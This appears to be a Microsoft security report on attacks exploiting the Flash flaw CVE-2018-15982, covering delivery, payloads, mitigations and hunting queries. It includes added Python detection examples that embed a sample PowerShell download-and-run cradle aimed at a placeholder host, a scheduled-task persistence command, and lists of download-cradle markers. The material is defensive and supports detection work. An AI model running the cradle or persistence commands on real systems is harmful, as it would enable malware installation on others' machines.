CVE-2018-15982 exploit attacks
In late November 2018, a targeted attack against a medical institution in Russia exploited CVE-2018-15982, a zero-day remote code execution vulnerability in Adobe Flash Player. Adobe released an emergency patch in security bulletin APSB18-42 on December 5, 2018.
Attackers and security researchers alike typically gain access to exploits by reverse-engineering vendor patches or through sharing of proof-of-concept samples. As exploits are added to exploit kits and penetration testing tools, use of the exploit may become widespread. However, in the case of CVE-2018-15982, only one additional attack using the exploit has been reported so far, and that incident simply reused existing proof-of-concept content with no revisions. The lack of widespread abuse can likely be credited in part to Adobe’s swift action as well as to the highly targeted nature of the attack itself.
Nevertheless, the zero-day attack highlights a number of mitigations that defenders should take advantage of to block similar attacks.
Update: Inclusion in exploit kits
While we observed limited activity at the time this exploit was reported, we expected a rise in code variants as well as related attack activity.
In the middle of January 2019, we started observing multiple campaigns exploiting CVE-2018-15982 and even found exploit code in exploit kits—packages typically sold in the dark web that combine different sets of exploit code, allowing attacks to automatically leverage multiple alternative exploitation mechanisms whenever one mechanism fails. CVE-2018-15982 exploit code is present in prevalent campaigns through the infamous Underminer, Fallout, or KaiXin exploit kits.
These campaigns have been observed delivering the GandCrab ransomware and the Zegost backdoor, although the exploit kits can be used to deliver other payloads. Microsoft Defender ATP provides updated protection against recent campaigns exploiting CVE-2018-15982, with enhanced heuristic coverage against future variants.
Initial attacks observed exploiting CVE-2018-15982 used spear-phishing emails with an attached RAR archive containing two files:
- A lure document
- A second RAR archive file disguised as a .jpg file
When the user opens the lure document, an embedded Flash ActiveX control containing the exploit is rendered. A Flash ActionScript runs a small command script that in turn unpacks and runs the payload, the file backup.exe, from the second RAR archive.
The payload copies itself to %LOCALAPPDATA%\NvidiaControlPanel\NVIDIAControlPanel.exe and creates a scheduled task that starts the backdoor whenever a user logs in. It then collects local system information and uploads it to a hardcoded command-and-control (C&C) IP address every five minutes.
Prevalent attacks using exploit kits
More recent attack campaigns exploiting CVE-2018-15982 are delivered through sites serving malicious Adobe Flash advertisements. The ads host exploit kits, mostly Underminer, Fallout, and KaiXin, that contain exploit code for CVE-2018-15982, among other vulnerabilities.
Upon successful exploitation, a set of PowerShell commands encoded in base64 runs and downloads a malware payload. The payloads seen so far are the GandCrab ransomware and the Zegost malicious backdoor in separate campaigns.
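The base64-encoded PowerShell stage described above is a good place for defenders to look, because the encoding hides the download cradle from plain substring matching. The following Python is an added example, not code from this report or from Microsoft: it decodes the UTF-16LE base64 argument of -EncodedCommand (and its common abbreviations) from a process command line and flags download-and-execute markers. The sample command lines, the example.invalid host and the marker list are constructed assumptions for illustration.

```python
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand; this pattern
# covers the spellings most often seen in telemetry (assumption: not exhaustive).
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-e(?:c|n|nc|nco|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})"
)

# Substrings that indicate a download-and-execute cradle once the script is decoded.
CRADLE_MARKERS = (
    "downloadstring", "downloadfile", "invoke-webrequest", "net.webclient",
    "invoke-expression", "iex", "start-process",
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script of a -EncodedCommand invocation, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")  # PowerShell encodes the script as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_powershell(cmdline: str) -> dict:
    """Flag an encoded PowerShell command line whose script contains cradle markers."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "markers": [], "suspicious": False}
    lowered = script.lower()
    hits = [marker for marker in CRADLE_MARKERS if marker in lowered]
    return {"encoded": True, "script": script, "markers": hits, "suspicious": bool(hits)}


def make_encoded(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample scripts (not taken from the page). The first mimics a
# download-and-run cradle with a placeholder host; the second is a benign
# encoded maintenance script included for contrast.
CRADLE_SCRIPT = (
    "(New-Object Net.WebClient).DownloadFile('http://example.invalid/p.exe', "
    "\"$env:TEMP\\p.exe\"); Start-Process \"$env:TEMP\\p.exe\""
)
BENIGN_SCRIPT = "Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\Temp\\svc.csv"

# Constructed command lines as they might appear in process-creation telemetry.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoP -W Hidden -enc " + make_encoded(CRADLE_SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -EncodedCommand " + make_encoded(BENIGN_SCRIPT),
    "powershell.exe -File C:\\Scripts\\inventory.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(analyze_powershell(line))
```

Only the first sample is reported as suspicious: the second decodes cleanly but carries no cradle marker, and the third is not encoded at all. In production the marker list should be treated as a starting point and tuned against the environment's legitimate encoded scripts.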
Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- To address the exploit used by this threat, mitigate the following vulnerability: CVE-2018-15982.
- Use hardware-based isolation, provided through Windows Defender System Guard, and exploit protection capabilities in Windows 10. These capabilities provide strategic mitigation of exploitation techniques.
- Turn on cloud-delivered protection and automatic sample submission on Windows Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new variants and polymorphic copies of this threat.
- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use Office 365 ATP for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Office 365 to recheck links on click and delete sent mail in response to newly acquired threat intelligence.
- Turn on attack surface reduction rules, including rules that can block advanced macro activity, executable content, process creation, and process injection initiated by Office applications.
- Check your perimeter firewall and proxy to restrict servers from making arbitrary connections to the internet to browse or download files. Such restrictions help inhibit malware downloads and command-and-control (C&C) activity.
Windows Defender Antivirus detects threat components as the following malware:
Endpoint detection and response (EDR)
Alerts with the following titles in the Microsoft Defender Security Center portal can indicate threat activity on your network:
- A malicious file was detected based on indication provided by O365
- Malicious document (CVE-2018-15982) Detected
- CrisisHT backdoor detected
- Malicious SWF Files (CVE-2018-15982) Detected
Attack surface reduction rules
These rules can block or audit activity associated with this threat:
- Block all Office applications from creating child processes
- Block Office applications from creating executable content
To locate possible attack activity involving the extraction of the malicious RAR archive, run the following query:
ProcessCreationEvents
| where FileName == "cmd.exe"
| where ProcessCommandLine contains @"set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR;"
| where ProcessCommandLine contains @"cd /d %~dp0 & rar.exe e -o+ -r -inul*.rar"
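To show the same hunting logic outside the advanced hunting portal, and to extend it to the logon-triggered scheduled task the initial payload creates (described above under the initial attack), here is an added Python example that is not code from this report or from Microsoft. It applies the query's two command-line predicates to constructed ProcessCreationEvents-style records, and adds a second check for schtasks.exe registering an onlogon task whose action is the %LOCALAPPDATA%\NvidiaControlPanel\NVIDIAControlPanel.exe path. The sample events, the user profile path, the task name and the initiating process names are constructed assumptions; the page does not state the task name.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class ProcessCreationEvent:
    # Field names follow the ProcessCreationEvents columns used in the query above;
    # the records built from this class below are constructed samples.
    FileName: str
    ProcessCommandLine: str
    InitiatingProcessFileName: str = ""


# Predicates from the hunting query. KQL 'contains' is case-insensitive, so the
# comparisons below lower-case both sides. The extraction marker stops before
# "*.rar" so that either spacing of "-inul*.rar" / "-inul *.rar" is matched.
RAR_PATH_MARKER = r"set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR;".lower()
RAR_EXTRACT_MARKER = r"cd /d %~dp0 & rar.exe e -o+ -r -inul".lower()

# Persistence path used by the initial attack's payload (relative part only, so
# that any user's %LOCALAPPDATA% matches).
PERSISTENCE_PATH = r"\NvidiaControlPanel\NVIDIAControlPanel.exe".lower()


def hunt_rar_extraction(events: List[ProcessCreationEvent]) -> List[ProcessCreationEvent]:
    """cmd.exe adding WinRAR to PATH and silently extracting the bundled archive."""
    hits = []
    for e in events:
        cl = e.ProcessCommandLine.lower()
        if e.FileName.lower() == "cmd.exe" and RAR_PATH_MARKER in cl and RAR_EXTRACT_MARKER in cl:
            hits.append(e)
    return hits


def hunt_logon_persistence(events: List[ProcessCreationEvent]) -> List[ProcessCreationEvent]:
    """schtasks.exe creating a logon-triggered task that runs the payload's known path."""
    hits = []
    for e in events:
        if e.FileName.lower() != "schtasks.exe":
            continue
        cl = e.ProcessCommandLine.lower()
        if "/create" in cl and "onlogon" in cl and PERSISTENCE_PATH in cl:
            hits.append(e)
    return hits


def hunt_all(events: List[ProcessCreationEvent]) -> dict:
    """Run both hunts and return the matching command lines keyed by finding type."""
    return {
        "rar_extraction": [e.ProcessCommandLine for e in hunt_rar_extraction(events)],
        "logon_persistence": [e.ProcessCommandLine for e in hunt_logon_persistence(events)],
    }


# Constructed sample telemetry (not from the page): one hit and one benign
# record for each hunt. The task name and profile path are placeholders.
SAMPLE_EVENTS = [
    ProcessCreationEvent(
        "cmd.exe",
        r"cmd.exe /c set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR; "
        r"& cd /d %~dp0 & rar.exe e -o+ -r -inul *.rar",
        "winword.exe",
    ),
    ProcessCreationEvent("cmd.exe", r"cmd.exe /c dir C:\Users", "explorer.exe"),
    ProcessCreationEvent(
        "schtasks.exe",
        r'schtasks.exe /create /tn "NvidiaControlPanel" /sc onlogon '
        r'/tr "C:\Users\alice\AppData\Local\NvidiaControlPanel\NVIDIAControlPanel.exe"',
        "backup.exe",
    ),
    ProcessCreationEvent(
        "schtasks.exe", r'schtasks.exe /create /tn "Backup" /sc daily /tr C:\Tools\backup.cmd', "cmd.exe"
    ),
]

if __name__ == "__main__":
    for kind, lines in hunt_all(SAMPLE_EVENTS).items():
        print(kind, lines)
```

The scheduled-task check deliberately matches on the action path rather than the task name, since the name is attacker-controlled and not documented here; the path under %LOCALAPPDATA% is the indicator the report actually gives.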
Secondary RAR archive
Exploit kit campaigns
SWF files (SHA-1)